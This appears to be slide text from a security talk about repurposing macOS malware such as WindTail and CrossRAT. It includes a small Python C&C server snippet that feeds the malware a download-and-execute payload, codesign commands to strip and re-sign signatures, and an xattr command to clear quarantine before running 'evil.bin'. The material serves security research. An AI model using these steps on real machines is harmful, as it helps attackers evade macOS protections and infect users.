EXC_CRASH (SIGKILL) Termination Reason: EXEC, [0xc] This UPX compressed binary contains an invalid Mach-O header and cannot be loaded. ColdRoot (PoC) (crashes on macOS) her: "I was hacked!" me: clearly "planted" CrossRAT (govt malware): "targets include individuals and entities that a nation state might typically attack, including governments, [and] military targets"
#request for file name if 'runs=tup' in self.path: self.wfile.write('update.zip') #request for file contents elif 'update.zip' in self.path: with open('update.zip', mode='rb') as file: self.wfile.write(file.read()) 01 02 03 04 05 06 07 08 09 10 request: file name (we pass back "update.zip") request: file contents "update.zip" c&c logic: download & execute "update.bin"
OSX.WindTail/Final_Presentation.app $ codesign -dvv OSX.WindTail/Final_Presentation.app Final_Presentation.app: code object is not signed at all remove (revoked) certificate undocumented ﬂag: '--remove-signature ' $ codesign -s "Developer ID Application: <some dev id>" (re)sign (re)signed, validly
$ xattr -rc evil.com $ ./evil.bin [+] running evil.bin Given aritrary code execution (i.e. via exploit) ...an attacker can still run arbitrary code, such as repuposed malware notarization enforcement: only user-downloaded ﬁles